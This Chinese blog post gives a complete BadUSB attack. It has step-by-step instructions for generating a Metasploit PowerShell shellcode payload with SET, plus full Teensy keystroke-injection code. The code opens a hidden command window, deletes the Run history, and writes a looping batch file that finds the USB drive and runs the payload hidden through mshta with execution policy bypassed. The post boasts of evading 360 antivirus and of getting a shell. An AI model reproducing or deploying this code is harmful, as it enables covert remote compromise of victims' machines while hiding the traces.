BadUSB(烧鹅) 执行 metasploit payload

作者: admin 分类: 实用脚本 发布时间: 2016-05-23 23:11

无视 360 安全卫士

使用 :(S.E.T) Social-Engineer Toolkit 生成 Powershell Metasploit Payload

BadUSB(烧鹅) 执行 metasploit payload

BadUSB(烧鹅) 执行 metasploit payloadBadUSB(烧鹅) 执行 metasploit payload

选择相关选项:

1) Social-Engineering Attacks
9) Powershell Attack Vectors
1) Powershell Alphanumeric Shellcode Injector

payload代码:

/root/.set/reports/powershell/x86_powershell_injection.txt

代码可以直接用 但是 直接 通过 Teensy 模拟键盘写入 代码太长

所以用 执行文件的形式(当然也可以直接写成一个bat 但是执行敏感操作易被杀软杀掉!)

该Payload 经过 base64+ UTF-16LE 编码

转码:

awk '{print $7}' x86_powershell_injection.txt | base64 -d | iconv -f UTF-16LE -t ASCII -c >/var/www/html/pp.txt

将烧鹅 卷标修改为 FireGoose

将payload 保存为 烧鹅磁盘 files/Fire_shell.ps1

写入

BadUSB(烧鹅) 执行 metasploit payload

void setup()
{
delay(5000);
Keyboard.set_modifier(MODIFIERKEY_RIGHT_GUI);
Keyboard.set_key1(KEY_R);
Keyboard.send_now();
delay(100);
Keyboard.set_modifier(MODIFIERKEY_SHIFT);
Keyboard.send_now();
Keyboard.print("cmd /T:01 /K mode CON: COLS=16 LINES=1"); //开启很小的cmd窗口
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(200);
Keyboard.println("reg delete HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU /f"); //清理运行记录
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.println("del /f /q %tmp%\\w.bat 2>nul"); //先删除可能存在的批处理
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.println("copy con %tmp%\\w.bat"); //写入新的批处理文件
Keyboard.send_now();
Keyboard.println("@echo off");
Keyboard.println("chcp 936");
Keyboard.println(":lp");
Keyboard.println("ping 127.1 -n 5 >nul");
Keyboard.println("for /F %%A in ('wmic volume get driveletter^,label ^| find /i \"FireGoose\"') do (set Fire=%%A)"); //利用wim查询指定U盘是否插入电脑
Keyboard.println("IF EXIST \"%Fire%\\files\\Fire_shell.ps1\" (copy /y \"%Fire%\\files\\Fire_shell.ps1\" %tmp%\\");//若存在指定文件,就复制到%tmp%
Keyboard.println("mshta vbscript:createobject^(\"wscript.shell\"^).run^(\"powershell -NoP -NonI -W Hidden -Exec Bypass -file %tmp%\\Fire_shell.ps1\",0^)^(window.close^)) ELSE (goto :lp )");//利用VBS隐藏执行bat
Keyboard.set_modifier(MODIFIERKEY_CTRL); //保存以上写入的批处理
Keyboard.set_key1(KEY_Z);
Keyboard.send_now();
Keyboard.set_modifier(0);
Keyboard.set_key1(0);
Keyboard.send_now();
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
delay(200);
Keyboard.println("mshta vbscript:createobject(\"wscript.shell\").run(\"%tmp%\\w.bat\",0)(window.close) && exit"); //VBS隐藏执行w.bat并退出
Keyboard.set_key1(KEY_ENTER);
Keyboard.send_now();
Keyboard.set_modifier(0); //释放所有按键
Keyboard.set_key1(0);
Keyboard.send_now();

}
void loop()
{
}

插入 姿势很多

插入烧鹅成功上线

BadUSB(烧鹅) 执行 metasploit payload
相关参考:
http://blog.csdn.net/b0rn_t0_w1n/article/details/50166435
https://github.com/RadioWar/FireGoose
https://gist.github.com/coldfusion39/4761f1494873d14d1147
http://www.pjrc.com/teensy/td_keyboard.html

相关资源下载
Teensy:
https://www.pjrc.com/teensy/td_128/TeensyduinoInstall.exe

Arduino:
https://downloads.arduino.cc/arduino-1.6.8-windows.zip

更多请参考: wiki.radiowar.org

发表评论

标签云